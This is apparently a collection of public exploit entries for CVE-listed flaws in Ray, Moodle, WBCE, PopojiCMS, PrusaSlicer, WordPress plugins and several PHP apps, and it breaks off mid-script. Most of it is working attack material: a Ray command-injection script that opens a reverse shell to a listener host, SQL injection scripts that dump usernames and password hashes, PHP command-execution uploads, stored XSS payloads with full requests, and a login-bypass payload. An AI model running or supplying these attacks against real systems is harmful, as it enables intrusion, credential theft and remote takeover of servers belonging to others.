# Exploit Title: Ray OS v2.6.3 - Command Injection RCE(Unauthorized) # Description: # The Ray Project dashboard contains a CPU profiling page, and the format parameter is # not validated before being inserted into a system command executed in a shell, allowing # for arbitrary command execution. If the system is configured to allow passwordless sudo # (a setup some Ray configurations require) this will result in a root shell being returned # to the user. If not configured, a user level shell will be returned # Version: <= 2.6.3 # Date: 2024-4-10 # Exploit Author: Fire_Wolf # Tested on: Ubuntu 20.04.6 LTS # Vendor Homepage: https://www.ray.io/ # Software Link: https://github.com/ray-project/ray # CVE: CVE-2023-6019 # Refer: https://huntr.com/bounties/d0290f3c-b302-4161-89f2-c13bb28b4cfe # ========================================================================================== # !usr/bin/python3 # coding=utf-8 import base64 import argparse import requests import urllib3 proxies = {"http": "127.0.0.1:8080"} headers = { "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0" } def check_url(target, port): target_url = target + ":" + port https = 0 if 'http' not in target: try: urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) test_url = 'http://' + target_url response = requests.get(url=test_url, headers=headers, verify=False, timeout=3) if response.status_code != 200: is_https = 0 return is_https except Exception as e: print("ERROR! The Exception is:" + format(e)) if https == 1: return "https://" + target_url else: return "http://" + target_url def exp(target,ip,lhost, lport): payload = 'python3 -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("' + lhost + '",' + lport + '));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")\'' print("[*]Payload is: " + payload) b64_payload = base64.b64encode(payload.encode()) print("[*]Base64 encoding payload is: " + b64_payload.decode()) exp_url = target + '/worker/cpu_profile?pid=3354&ip=' + str(ip) + '&duration=5&native=0&format=`echo ' + b64_payload.decode() + ' |base64$IFS-d|sudo%20sh`' # response = requests.get(url=exp_url, headers=headers, verify=False, timeout=3, prxoy=proxiess) print(exp_url) urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) response = requests.get(url=exp_url, headers=headers, verify=False) if response.status_code == 200: print("[-]ERROR: Exploit Failed,please check the payload.") else: print("[+]Exploit is finished,please check your machine!") if __name__ == '__main__': parser = argparse.ArgumentParser( description=''' ⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀ ⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄ ⡠⠄⡄⡄⡠⡀⣀⡀⢒⠄⡔⡄⢒⠄⢒⠄⣀⡀⣖⡂⡔⡄⢴⠄⣖⡆⠄⠄⡤⡀⡄⡄ ⠑⠂⠘⠄⠙⠂⠄⠄⠓⠂⠑⠁⠓⠂⠒⠁⠄⠄⠓⠃⠑⠁⠚⠂⠒⠃⠐⠄⠗⠁⠬⠃ ⢰⣱⢠⢠⠠⡦⢸⢄⢀⢄⢠⡠⠄⠄⢸⠍⠠⡅⢠⡠⢀⢄⠄⠄⢸⣸⢀⢄⠈⡇⠠⡯⠄ ⠘⠘⠈⠚⠄⠓⠘⠘⠈⠊⠘⠄⠄⠁⠘⠄⠐⠓⠘⠄⠈⠓⠠⠤⠘⠙⠈⠊⠐⠓⠄⠃⠄ ⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀ ⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄ ''', formatter_class=argparse.RawDescriptionHelpFormatter, ) parser.add_argument('-t', '--target', type=str, required=True, help='tart ip') parser.add_argument('-p', '--port', type=str, default=80, required=False, help='tart host port') parser.add_argument('-L', '--lhost', type=str, required=True, help='listening host ip') parser.add_argument('-P', '--lport', type=str, default=80, required=False, help='listening port') args = parser.parse_args() # target = args.target ip = args.target # port = args.port # lhost = args.lhost # lport = args.lport targeturl = check_url(args.target, args.port) print(targeturl) print("[*] Checking in url: " + targeturl) exp(targeturl, ip, args.lhost, args.lport)

# Exploit Title: HTMLy Version v2.9.6 - Stored XSS # Exploit Author: tmrswrr # Vendor Homepage: https://www.htmly.com/ # Version 3.10.8.21 # Date : 04/08/2024 1 ) Login admin https://127.0.0.1/HTMLy/admin/config 2 ) General Setting > Blog title > "><img src=x onerrora=confirm() onerror=confirm(1)> 3 ) After save it you will be see XSS alert

# Exploit Title: Wordpress Plugin Playlist for Youtube - Stored Cross-Site Scripting (XSS) # Date: 22 March 2024 # Exploit Author: Erdemstar # Vendor: https://wordpress.com/ # Version: 1.32 # Proof Of Concept: 1. Click Add a new playlist and enter the XSS payload as below into the properties named "Name" or "Playlist ID". # PoC Video: https://www.youtube.com/watch?v=jrH5OHBoTns # Vulnerable Properties name: name, playlist_id # Payload: "><script>alert(document.cookie)</script> # Request: POST /wp-admin/admin.php?page=playlists_yt_free HTTP/2 Host: erdemstar.local Cookie: thc_time=1713843219; booking_package_accountKey=2; wordpress_sec_dd86dc85a236e19160e96f4ec4b56b38=admin%7C1714079650%7CIdP5sIMFkCzSNzY8WFwU5GZFQVLOYP1JZXK77xpoW5R%7C27abdae5aa28462227b32b474b90f0e01fa4751d5c543b281c2348b60f078d2f; wp-settings-time-4=1711124335; cld_2=like; _hjSessionUser_3568329=eyJpZCI6ImY4MWE3NjljLWViN2MtNWM5MS05MzEyLTQ4MGRlZTc4Njc5OSIsImNyZWF0ZWQiOjE3MTEzOTM1MjQ2NDYsImV4aXN0aW5nIjp0cnVlfQ==; wp-settings-time-1=1712096748; wp-settings-1=mfold%3Do%26libraryContent%3Dbrowse%26uploader%3D1%26Categories_tab%3Dpop%26urlbutton%3Dfile%26editor%3Dtinymce%26unfold%3D1; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; wordpress_logged_in_dd86dc85a236e19160e96f4ec4b56b38=admin%7C1714079650%7CIdP5sIMFkCzSNzY8WFwU5GZFQVLOYP1JZXK77xpoW5R%7Cc64c696fd4114dba180dc6974e102cc02dc9ab8d37482e5c4e86c8e84a1f74f9 Content-Length: 178 Cache-Control: max-age=0 Sec-Ch-Ua: "Not(A:Brand";v="24", "Chromium";v="122" Sec-Ch-Ua-Mobile: ?0 Sec-Ch-Ua-Platform: "macOS" Upgrade-Insecure-Requests: 1 Origin: https://erdemstar.local Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.112 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: https://erdemstar.local/wp-admin/admin.php?page=playlists_yt_free Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Priority: u=0, i _wpnonce=17357e6139&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dplaylists_yt_free&name="><script>alert(document.cookie)</script>&playlist_id=123&template=1&text_size=123&text_color=%23000000

# Exploit Title: PopojiCMS Version : 2.0.1 Remote Command Execution # Date: 27/11/2023 # Exploit Author: tmrswrr # Vendor Homepage: https://www.popojicms.org/ # Software Link: https://github.com/PopojiCMS/PopojiCMS/archive/refs/tags/v2.0.1.zip # Version: Version : 2.0.1 # Tested on: https://www.softaculous.com/apps/cms/PopojiCMS ##POC: 1 ) Login with admin cred and click settings 2 ) Click on config , write your payload in Meta Social > <?php echo system('id'); ?> 3 ) Open main page , you will be see id command result POST /PopojiCMS9zl3dxwbzt/po-admin/route.php?mod=setting&act=metasocial HTTP/1.1 Host: demos5.softaculous.com Cookie: _ga_YYDPZ3NXQQ=GS1.1.1701095610.3.1.1701096569.0.0.0; _ga=GA1.1.386621536.1701082112; AEFCookies1526[aefsid]=3cbt9mdj1kpi06aj1q5r8yhtgouteb5s; PHPSESSID=b6f1f9beefcec94f09824efa9dae9847; lang=gb; demo_563=%7B%22sid%22%3A563%2C%22adname%22%3A%22admin%22%2C%22adpass%22%3A%22password%22%2C%22url%22%3A%22http%3A%5C%2F%5C%2Fdemos5.softaculous.com%5C%2FPopojiCMS9zl3dxwbzt%22%2C%22adminurl%22%3A%22http%3A%5C%2F%5C%2Fdemos5.softaculous.com%5C%2FPopojiCMS9zl3dxwbzt%5C%2Fpo-admin%5C%2F%22%2C%22dir_suffix%22%3A%229zl3dxwbzt%22%7D User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://demos5.softaculous.com/PopojiCMS9zl3dxwbzt/po-admin/admin.php?mod=setting Content-Type: application/x-www-form-urlencoded Content-Length: 58 Origin: https://demos5.softaculous.com Dnt: 1 Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 Te: trailers Connection: close meta_content=%3C%3Fphp+echo+system%28%27id%27%29%3B+%3F%3E Result: uid=1000(soft) gid=1000(soft) groups=1000(soft) uid=1000(soft) gid=1000(soft) groups=1000(soft)

# Exploit Title: Moodle Authenticated Time-Based Blind SQL Injection - "sort" Parameter # Google Dork: # Date: 04/11/2023 # Exploit Author: Julio Ángel Ferrari (Aka. T0X1Cx) # Vendor Homepage: https://moodle.org/ # Software Link: # Version: 3.10.1 # Tested on: Linux # CVE : CVE-2021-36393 import requests import string from termcolor import colored # Request details URL = "http://127.0.0.1:8080/moodle/lib/ajax/service.php?sesskey=ZT0E6J0xWe&info=core_course_get_enrolled_courses_by_timeline_classification" HEADERS = { "Accept": "application/json, text/javascript, */*; q=0.01", "Content-Type": "application/json", "X-Requested-With": "XMLHttpRequest", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.91 Safari/537.36", "Origin": "http://127.0.0.1:8080", "Referer": "http://127.0.0.1:8080/moodle/my/", "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.9", "Cookie": "MoodleSession=5b1rk2pfdpbcq2i5hmmern1os0", "Connection": "close" } # Characters to test characters_to_test = string.ascii_lowercase + string.ascii_uppercase + string.digits + "!@#$^&*()-_=+[]{}|;:'\",.<>?/" def test_character(payload): response = requests.post(URL, headers=HEADERS, json=[payload]) return response.elapsed.total_seconds() >= 3 def extract_value(column, label): base_payload = { "index": 0, "methodname": "core_course_get_enrolled_courses_by_timeline_classification", "args": { "offset": 0, "limit": 0, "classification": "all", "sort": "", "customfieldname": "", "customfieldvalue": "" } } result = "" for _ in range(50): # Assumes a maximum of 50 characters for the value character_found = False for character in characters_to_test: if column == "database()": base_payload["args"]["sort"] = f"fullname OR (database()) LIKE '{result + character}%' AND SLEEP(3)" else: base_payload["args"]["sort"] = f"fullname OR (SELECT {column} FROM mdl_user LIMIT 1 OFFSET 0) LIKE '{result + character}%' AND SLEEP(3)" if test_character(base_payload): result += character print(colored(f"{label}: {result}", 'red'), end="\r") character_found = True break if not character_found: break # Print the final result print(colored(f"{label}: {result}", 'red')) if __name__ == "__main__": extract_value("database()", "Database") extract_value("username", "Username") extract_value("password", "Password")

# Exploit Title: PrusaSlicer 2.6.1 - Arbitrary code execution on g-code export # Date: 16/01/2024 # Exploit Author: Kamil Breński # Vendor Homepage: https://www.prusa3d.com # Software Link: https://github.com/prusa3d/PrusaSlicer # Version: PrusaSlicer up to and including version 2.6.1 # Tested on: Windows and Linux # CVE: CVE-2023-47268 ========================================================================================== 1.) 3mf Metadata extension ========================================================================================== PrusaSlicer 3mf project (zip) archives contain the 'Metadata/Slic3r_PE.config' file which describe various project settings, this is an extension to the regular 3mf file. PrusaSlicer parses this additional file to read various project settings. One of the settings (post_process) is the post-processing script (https://help.prusa3d.com/article/post-processing-scripts_283913) this feature has great potential for abuse as it allows a malicious user to create an evil 3mf project that will execute arbitrary code when the targeted user exports g-code from the malicious project. A project file needs to be modified with a prost process script setting in order to execute arbitrary code, this is demonstrated on both a Windows and Linux host in the following way. ========================================================================================== 2.) PoC ========================================================================================== For the linux PoC, this CLI command is enough to execute the payload contained in the project. './prusa-slicer -s code-exec-linux.3mf'. After slicing, a new file '/tmp/hax' will be created. This particular PoC contains this 'post_process' entry in the 'Slic3r_PE.config' file: ``` ; post_process = "/usr/bin/id > /tmp/hax #\necho 'Here I am, executing arbitrary code on this host. Thanks for slicing (x_x)'>> /tmp/hax #" ``` Just slicing the 3mf using the `-s` flag is enough to start executing potentially malicious code. For the windows PoC with GUI, the malicious 3mf file needs to be opened as a project file (or the settings imported). After exporting, a pop-up executed by the payload will appear. The windows PoC contains this entry: ``` ; post_process = "C:\\Windows\\System32\\cmd.exe /c msg %username% Here I am, executing arbitrary code on this host. Thanks for slicing (x_x) " ```

# Exploit Title: |Unauthenticated SQL injection in WBCE 1.6.0 # Date: 15.11.2023 # Exploit Author: young pope # Vendor Homepage: https://github.com/WBCE/WBCE_CMS # Software Link: https://github.com/WBCE/WBCE_CMS/archive/refs/tags/1.6.0.zip # Version: 1.6.0 # Tested on: Kali linux # CVE : CVE-2023-39796 There is an sql injection vulnerability in *miniform* module which is a default module installed in the *WBCE* cms. It is an unauthenticated sqli so anyone could access it and takeover the whole database. In file /modules/miniform/ajax_delete_message.php there is no authentication check. On line |40| in this file, there is a |DELETE| query that is vulnerable, an attacker could jump from the query using tick sign - ```. Function |addslashes()| (https://www.php.net/manual/en/function.addslashes.php) escapes only these characters and not a tick sign: * single quote (') * double quote (") * backslash () * NUL (the NUL byte The DB_RECORD_TABLE parameter is vulnerable. If an unauthenticated attacker send this request: ``` POST /modules/miniform/ajax_delete_message.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36 Connection: close Content-Length: 162 Accept: */* Accept-Language: en Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate action=delete&DB_RECORD_TABLE=miniform_data`+WHERE+1%3d1+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+&iRecordID=1&DB_COLUMN=message_id&MODULE=&purpose=delete_record ``` The response is received after 6s. Reference links: * https://nvd.nist.gov/vuln/detail/CVE-2023-39796 * https://forum.wbce.org/viewtopic.php?pid=42046#p42046 * https://github.com/WBCE/WBCE_CMS/releases/tag/1.6.1 * https://pastebin.com/PBw5AvGp

# Exploit Title: Wordpress Plugin WP Video Playlist 1.1.1 - Stored Cross-Site Scripting (XSS) # Date: 12 April 2024 # Exploit Author: Erdemstar # Vendor: https://wordpress.com/ # Version: 1.1.1 # Proof Of Concept: 1. Click Add Video part and enter the XSS payload as below into the first input of form or Request body named "videoFields[post_type]". # PoC Video: https://www.youtube.com/watch?v=05dM91FiG9w # Vulnerable Property at Request: videoFields[post_type] # Payload: <script>alert(document.cookie)</script> # Request: POST /wp-admin/options.php HTTP/2 Host: erdemstar.local Cookie: thc_time=1713843219; booking_package_accountKey=2; wordpress_sec_dd86dc85a236e19160e96f4ec4b56b38=admin%7C1714079650%7CIdP5sIMFkCzSNzY8WFwU5GZFQVLOYP1JZXK77xpoW5R%7C27abdae5aa28462227b32b474b90f0e01fa4751d5c543b281c2348b60f078d2f; wp-settings-time-4=1711124335; cld_2=like; _hjSessionUser_3568329=eyJpZCI6ImY4MWE3NjljLWViN2MtNWM5MS05MzEyLTQ4MGRlZTc4Njc5OSIsImNyZWF0ZWQiOjE3MTEzOTM1MjQ2NDYsImV4aXN0aW5nIjp0cnVlfQ==; wp-settings-time-1=1712096748; wp-settings-1=mfold%3Do%26libraryContent%3Dbrowse%26uploader%3D1%26Categories_tab%3Dpop%26urlbutton%3Dfile%26editor%3Dtinymce%26unfold%3D1; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; wordpress_logged_in_dd86dc85a236e19160e96f4ec4b56b38=admin%7C1714079650%7CIdP5sIMFkCzSNzY8WFwU5GZFQVLOYP1JZXK77xpoW5R%7Cc64c696fd4114dba180dc6974e102cc02dc9ab8d37482e5c4e86c8e84a1f74f9 Content-Length: 395 Cache-Control: max-age=0 Sec-Ch-Ua: "Not(A:Brand";v="24", "Chromium";v="122" Sec-Ch-Ua-Mobile: ?0 Sec-Ch-Ua-Platform: "macOS" Upgrade-Insecure-Requests: 1 Origin: https://erdemstar.local Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.112 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: https://erdemstar.local/wp-admin/admin.php?page=video_manager Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Priority: u=0, i option_page=mediaManagerCPT&action=update&_wpnonce=29af746404&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dvideo_manager%26settings-updated%3Dtrue&videoFields%5BmeidaId%5D=1&videoFields%5Bpost_type%5D=<script>alert(document.cookie)</script>&videoFields%5BmediaUri%5D=dummy&videoFields%5BoptionName%5D=videoFields&videoFields%5BoptionType%5D=add&submit=Save+Changes

# Exploit Title: WBCE CMS Version : 1.6.1 Remote Command Execution # Date: 30/11/2023 # Exploit Author: tmrswrr # Vendor Homepage: https://wbce-cms.org/ # Software Link: https://github.com/WBCE/WBCE_CMS/archive/refs/tags/1.6.1.zip # Version: 1.6.1 # Tested on: https://www.softaculous.com/apps/cms/WBCE_CMS ## POC: 1 ) Login with admin cred and click Add-ons 2 ) Click on Language > Install Language > https://demos6.softaculous.com/WBCE_CMSgn4fqnl8mv/admin/languages/index.php 3 ) Upload upgrade.php > <?php echo system('id'); ?> , click install > https://demos6.softaculous.com/WBCE_CMSgn4fqnl8mv/admin/languages/install.php 4 ) You will be see id command result Result: uid=1000(soft) gid=1000(soft) groups=1000(soft) uid=1000(soft) gid=1000(soft) groups=1000(soft) ### Post Request: POST /WBCE_CMSgn4fqnl8mv/admin/languages/install.php HTTP/1.1 Host: demos6.softaculous.com Cookie: _ga_YYDPZ3NXQQ=GS1.1.1701347353.1.1.1701349000.0.0.0; _ga=GA1.1.1562523898.1701347353; AEFCookies1526[aefsid]=jefkds0yos40w5jpbhl6ue9tsbo2yhiq; demo_390=%7B%22sid%22%3A390%2C%22adname%22%3A%22admin%22%2C%22adpass%22%3A%22pass%22%2C%22url%22%3A%22https%3A%5C%2F%5C%2Fdemos4.softaculous.com%5C%2FImpressPagesgwupshhfxk%22%2C%22adminurl%22%3A%22https%3A%5C%2F%5C%2Fdemos4.softaculous.com%5C%2FImpressPagesgwupshhfxk%5C%2Fadmin.php%22%2C%22dir_suffix%22%3A%22gwupshhfxk%22%7D; demo_549=%7B%22sid%22%3A549%2C%22adname%22%3A%22admin%22%2C%22adpass%22%3A%22password%22%2C%22url%22%3A%22https%3A%5C%2F%5C%2Fdemos1.softaculous.com%5C%2FBluditbybuxqthew%22%2C%22adminurl%22%3A%22https%3A%5C%2F%5C%2Fdemos1.softaculous.com%5C%2FBluditbybuxqthew%5C%2Fadmin%5C%2F%22%2C%22dir_suffix%22%3A%22bybuxqthew%22%7D; demo_643=%7B%22sid%22%3A643%2C%22adname%22%3A%22admin%22%2C%22adpass%22%3A%22password%22%2C%22url%22%3A%22https%3A%5C%2F%5C%2Fdemos6.softaculous.com%5C%2FWBCE_CMSgn4fqnl8mv%22%2C%22adminurl%22%3A%22https%3A%5C%2F%5C%2Fdemos6.softaculous.com%5C%2FWBCE_CMSgn4fqnl8mv%5C%2Fadmin%22%2C%22dir_suffix%22%3A%22gn4fqnl8mv%22%7D; phpsessid-5505-sid=576d8b8dd92f6cabe3a235cb359c9b34; WBCELastConnectJS=1701349503; stElem___stickySidebarElement=%5Bid%3A0%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A1%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A2%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A3%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A4%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A5%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A6%5D%5Bvalue%3AnoClass%5D%23 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://demos6.softaculous.com/WBCE_CMSgn4fqnl8mv/admin/languages/index.php Content-Type: multipart/form-data; boundary=---------------------------86020911415982314764024459 Content-Length: 522 Origin: https://demos6.softaculous.com Dnt: 1 Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 Te: trailers Connection: close -----------------------------86020911415982314764024459 Content-Disposition: form-data; name="formtoken" 5d3c9cef-003aaa0a62e1196ebda16a7aab9a0cf881b9370c -----------------------------86020911415982314764024459 Content-Disposition: form-data; name="userfile"; filename="upgrade.php" Content-Type: application/x-php <?php echo system('id'); ?> -----------------------------86020911415982314764024459 Content-Disposition: form-data; name="submit" -----------------------------86020911415982314764024459-- ### Response : <!-- ################### Up from here: Original Code from original template ########### --> <!-- senseless positioning-table: needed for old modules which base on class td.content --> <div class="row" style="overflow:visible"> <div class="fg12"> <table id="former_positioning_table"> <tr> <td class="content"> uid=1000(soft) gid=1000(soft) groups=1000(soft) uid=1000(soft) gid=1000(soft) groups=1000(soft) <div class="top alertbox_error fg12 error-box"> <i class=" fa fa-2x fa-warning signal"></i> <p>Invalid WBCE CMS language file. Please check the text file.</p> <p><a href="index.php" class="button">Back

# Exploit Title: Savsoft Quiz v6.0 Enterprise - Persistent Cross-Site Scripting # Date: 2024-01-03 # Exploit Author: Eren Sen # Vendor: SAVSOFT QUIZ # Vendor Homepage: https://savsoftquiz.com # Software Link: https://savsoftquiz.com/web/index.php/online-demo/ # Version: < 6.0 # CVE-ID: N/A # Tested on: Kali Linux / Windows 10 # Vulnerabilities Discovered Date : 2024/01/03 # Persistent Cross Site Scripting (XSS) Vulnerability # Vulnerable Parameter Type: POST # Vulnerable Parameter: quiz_name # Proof of Concepts: https://demos1.softaculous.com/Savsoft_Quizdemk1my5jr/index.php/quiz/edit_quiz/13 # HTTP Request: POST /Savsoft_Quizdemk1my5jr/index.php/quiz/insert_quiz/ HTTP/1.1 Host: demos1.softaculous.com Cookie: ci_session=xxxxxxxxxxxxxxxxxxxxxxxxx Content-Length: 411 Cache-Control: max-age=0 Sec-Ch-Ua: Sec-Ch-Ua-Mobile: ?0 Sec-Ch-Ua-Platform: "" Upgrade-Insecure-Requests: 1 Origin: https://demos1.softaculous.com Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: https://demos1.softaculous.com/Savsoft_Quizdemk1my5jr/index.php/quiz/add_new Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close quiz_name=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&description=%3Cp%3Etest%3C%2Fp%3E&start_date=2024-01-04+01%3A00%3A27&end_date=2025-01-03+01%3A00%3A27&duration=10&maximum_attempts=10&pass_percentage=50&correct_score=1&incorrect_score=0&ip_address=&view_answer=1&with_login=1&show_chart_rank=1&camera_req=0&gids%5B%5D=1&quiz_template=Default&question_selection=0&quiz_price=0&gen_certificate=0&certificate_text=

# Exploit Title: Stock Management System v1.0 - Unauthenticated SQL Injection # Date: February 6, 2024 # Exploit Author: Josué Mier (aka blu3ming) Security Researcher & Penetration Tester @wizlynx group # Vendor Homepage: https://www.sourcecodester.com/php/15023/stock-management-system-phpoop-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/sms.zip # Tested on: Linux and Windows, XAMPP # CVE-2023-51951 # Vendor: oretnom23 # Version: v1.0 # Exploit Description: # The web application Stock Management System is affected by an unauthenticated SQL Injection affecting Version 1.0, allowing remote attackers to dump the SQL database using an Error-Based Injection attack. import requests from bs4 import BeautifulSoup import argparse def print_header(): print("\033[1m\nStock Management System v1.0\033[0m") print("\033[1mSQL Injection Exploit\033[0m") print("\033[96mby blu3ming\n\033[0m") def parse_response(target_url): try: target_response = requests.get(target_url) soup = BeautifulSoup(target_response.text, 'html.parser') textarea_text = soup.find('textarea', {'name': 'remarks', 'id': 'remarks'}).text # Split the text using ',' as a delimiter users = textarea_text.split(',') for user in users: # Split username and password using ':' as a delimiter username, password = user.split(':') print("| {:<20} | {:<40} |".format(username, password)) except: print("No data could be retrieved. Try again.") def retrieve_data(base_url): target_path = '/sms/admin/?page=purchase_order/manage_po&id=' payload = "'+union+select+1,2,3,4,5,6,7,8,group_concat(username,0x3a,password),10,11,12,13+from+users--+-" #Dump users table target_url = base_url + target_path + payload print("+----------------------+------------------------------------------+") print("| {:<20} | {:<40} |".format("username", "password")) print("+----------------------+------------------------------------------+") parse_response(target_url) print("+----------------------+------------------------------------------+\n") if __name__ == "__main__": about = 'Unauthenticated SQL Injection Exploit - Stock Management System' parser = argparse.ArgumentParser(description=about) parser.add_argument('--url', dest='base_url', required=True, help='Stock Management System URL') args = parser.parse_args() print_header() retrieve_data(args.base_url)

# Exploit Title: Online Fire Reporting System SQL Injection Authentication Bypass # Date: 02/10/2024 # Exploit Author: Diyar Saadi # Vendor Homepage: https://phpgurukul.com/online-fire-reporting-system-using-php-and-mysql/ # Software Link: https://phpgurukul.com/projects/Online-Fire-Reporting-System-using-PHP.zip # Version: V 1.2 # Tested on: Windows 11 + XAMPP 8.0.30 ## Exploit Description ## SQL Injection Vulnerability in ofrs/admin/index.php : The SQL injection vulnerability in the ofrs/admin/index.php script arises from insecure handling of user input during the login process. ## Steps to reproduce ## 1- Open the admin panel page by following URL : http://localhost/ofrs/admin/index.php 2- Enter the following payload from username-box : admin'or'1-- 3- Press Login button or press Enter . ## Proof Of Concept [1] ## POST /ofrs/admin/index.php HTTP/1.1 Host: localhost Content-Length: 46 Cache-Control: max-age=0 sec-ch-ua: "Chromium";v="121", "Not A(Brand";v="99" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://localhost/ofrs/admin/index.php Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=fmnj70mh1qo2ssv80mlsv50o29 Connection: close username=admin%27or%27--&inputpwd=&login=login ## Proof Of Concept [ Python Based Script ] [2] ## import os import requests from selenium import webdriver from selenium.webdriver.common.by import By from selenium.webdriver.support.ui import WebDriverWait from selenium.webdriver.support import expected_conditions as EC import pyautogui banner = """ ░█████╗░███████╗██████╗░░██████╗  ░█████╗░███╗░░░███╗░██████╗ ██╔══██╗██╔════╝██╔══██╗██╔════╝  ██╔══██╗████╗░████║██╔════╝ ██║░░██║█████╗░░██████╔╝╚█████╗░  ██║░░╚═╝██╔████╔██║╚█████╗░ ██║░░██║██╔══╝░░██╔══██╗░╚═══██╗  ██║░░██╗██║╚██╔╝██║░╚═══██╗ ╚█████╔╝██║░░░░░██║░░██║██████╔╝  ╚█████╔╝██║░╚═╝░██║██████╔╝ ░╚════╝░╚═╝░░░░░╚═╝░░╚═╝╚═════╝░  ░╚════╝░╚═╝░░░░░╚═╝╚═════╝░ # Code By : Diyar Saadi """ print(banner) payload_requests = input("Enter the payload: ") url_requests = "http://localhost/ofrs/admin/index.php" data = { 'username': payload_requests, 'password': 'password', 'login': 'Login' } headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 